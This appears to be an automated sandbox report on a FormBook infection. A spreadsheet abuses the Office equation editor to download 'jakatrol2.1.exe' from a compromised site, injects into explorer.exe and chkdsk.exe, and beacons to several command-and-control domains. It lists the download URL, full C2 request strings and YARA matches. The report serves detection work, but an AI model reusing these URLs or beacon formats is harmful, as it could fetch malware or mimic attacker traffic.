          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: explorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=luxpsy.com
          Source: chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exeJump to behavior
          Source: unknownDNS traffic detected: queries for: mail.treeoflifeadventures.com
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036BB92B LoadLibraryW,URLDownloadToFileW,2_2_036BB92B
          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mail.treeoflifeadventures.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41 HTTP/1.1Host: www.narrativepages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=rR7wD3U/ZV6dBjvSlK9KatPYfQs2u0cQXMzY4PO5wsCIJRW7frAjgDUNgmxBJMGJ1YneTQ==&BL3=KP-PB41 HTTP/1.1Host: www.luxpsy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41 HTTP/1.1Host: www.sxchenggu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41 HTTP/1.1Host: www.centralngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41 HTTP/1.1Host: www.west-paws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1Host: www.miamirealestatecommercial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1Host: www.miamirealestatecommercial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 14 Nov 2023 12:28:45 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00404FC2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1784, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1516, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: chkdsk.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004047D35_2_004047D3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004061D45_2_004061D4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0040F0856_2_0040F085
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004133666_2_00413366
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004194C06_2_004194C0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004125706_2_00412570
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_004175146_2_00417514
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0041261D6_2_0041261D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0041379B6_2_0041379B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0041D8DE6_2_0041D8DE
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00412B196_2_00412B19
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00426BA16_2_00426BA1
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00422EC96_2_00422EC9
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00412F316_2_00412F31
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00428FBD6_2_00428FBD
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_002408B76_2_002408B7
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_00240A426_2_00240A42
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041D8107_2_0041D810
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041EB0E7_2_0041EB0E
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041C3A77_2_0041C3A7
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041E4C57_2_0041E4C5
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0041DDD47_2_0041DDD4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00402D897_2_00402D89
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00409E4D7_2_00409E4D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00409E507_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0073E0C67_2_0073E0C6
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0073E2E97_2_0073E2E9
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0078A37B7_2_0078A37B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007423057_2_00742305
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007663DB7_2_007663DB
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007E63BF7_2_007E63BF
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007C443E7_2_007C443E
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007865407_2_00786540
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0075C5F07_2_0075C5F0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007C05E37_2_007C05E3
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0078A6347_2_0078A634
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007E26227_2_007E2622
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0074E6C17_2_0074E6C1
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007446807_2_00744680
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0074C7BC7_2_0074C7BC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0076286D7_2_0076286D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0074C85C7_2_0074C85C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0078C9207_2_0078C920
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007D49F57_2_007D49F5
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007569FE7_2_007569FE
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007429B27_2_007429B2
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007E098E7_2_007E098E
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007C6BCB7_2_007C6BCB
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007ECBA47_2_007ECBA4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007CAC5E7_2_007CAC5E
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007E2C9C7_2_007E2C9C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0074CD5B7_2_0074CD5B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00770D3B7_2_00770D3B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0075EE4C7_2_0075EE4C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00772E2F7_2_00772E2F
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00750F3F7_2_00750F3F
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007B2FDC7_2_007B2FDC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007DCFB17_2_007DCFB1
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007BD06D7_2_007BD06D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0075905A7_2_0075905A
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007430407_2_00743040
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0076D0057_2_0076D005
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007CD13F7_2_007CD13F
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007E12387_2_007E1238
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007473537_2_00747353
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0073F3CF7_2_0073F3CF
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0077D47D7_2_0077D47D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007754857_2_00775485
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007514897_2_00751489
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0074351F7_2_0074351F
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007E35DA7_2_007E35DA
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007D771D7_2_007D771D
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007757C37_2_007757C3
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007C579A7_2_007C579A
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007DF8EE7_2_007DF8EE
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007BF8C47_2_007BF8C4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007C59557_2_007C5955
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007C394B7_2_007C394B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007F3A837_2_007F3A83
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_00767B007_2_00767B00
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0073FBD77_2_0073FBD7
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007CDBDA7_2_007CDBDA
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007DFDDD7_2_007DFDDD
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_0076DF7C7_2_0076DF7C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 7_2_007CBF147_2_007CBF14
          Source: C:\Windows\explorer.exeCode function: 8_2_07D80B308_2_07D80B30
          Source: C:\Windows\explorer.exeCode function: 8_2_07D80B328_2_07D80B32
          Source: C:\Windows\explorer.exeCode function: 8_2_07D862328_2_07D86232
          Source: C:\Windows\explorer.exeCode function: 8_2_07D895CD8_2_07D895CD
          Source: C:\Windows\explorer.exeCode function: 8_2_07D839128_2_07D83912
          Source: C:\Windows\explorer.exeCode function: 8_2_07D7DD028_2_07D7DD02
          Source: C:\Windows\explorer.exeCode function: 8_2_07D7C0828_2_07D7C082
          Source: C:\Windows\explorer.exeCode function: 8_2_07D850368_2_07D85036
          Source: C:\Windows\explorer.exeCode function: 8_2_0807F2328_2_0807F232
          Source: C:\Windows\explorer.exeCode function: 8_2_0807E0368_2_0807E036
          Source: C:\Windows\explorer.exeCode function: 8_2_080750828_2_08075082
          Source: C:\Windows\explorer.exeCode function: 8_2_08076D028_2_08076D02
          Source: C:\Windows\explorer.exeCode function: 8_2_0807C9128_2_0807C912
          Source: C:\Windows\explorer.exeCode function: 8_2_08079B328_2_08079B32
          Source: C:\Windows\explorer.exeCode function: 8_2_08079B308_2_08079B30
          Source: C:\Windows\explorer.exeCode function: 8_2_080825CD8_2_080825CD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0201E2E910_2_0201E2E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202230510_2_02022305
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0206A37B10_2_0206A37B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020C63BF10_2_020C63BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020463DB10_2_020463DB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0201E0C610_2_0201E0C6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020C262210_2_020C2622
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0206A63410_2_0206A634
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202468010_2_02024680
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202E6C110_2_0202E6C1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202C7BC10_2_0202C7BC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020A443E10_2_020A443E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0206654010_2_02066540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020A05E310_2_020A05E3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0203C5F010_2_0203C5F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020CCBA410_2_020CCBA4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020A6BCB10_2_020A6BCB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202C85C10_2_0202C85C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0204286D10_2_0204286D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0206C92010_2_0206C920
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020C098E10_2_020C098E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020229B210_2_020229B2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020369FE10_2_020369FE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020B49F510_2_020B49F5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02052E2F10_2_02052E2F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0203EE4C10_2_0203EE4C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02030F3F10_2_02030F3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020BCFB110_2_020BCFB1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02092FDC10_2_02092FDC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020AAC5E10_2_020AAC5E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020C2C9C10_2_020C2C9C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_02050D3B10_2_02050D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202CD5B10_2_0202CD5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020C123810_2_020C1238
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202735310_2_02027353
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0201F3CF10_2_0201F3CF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0204D00510_2_0204D005
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0202304010_2_02023040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0203905A10_2_0203905A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0209D06D10_2_0209D06D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020AD13F10_2_020AD13F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020B771D10_2_020B771D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020A579A10_2_020A579A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_020557C310_2_020557C3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0205D47D10_2_0205D47D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_0205548510_2_02055485
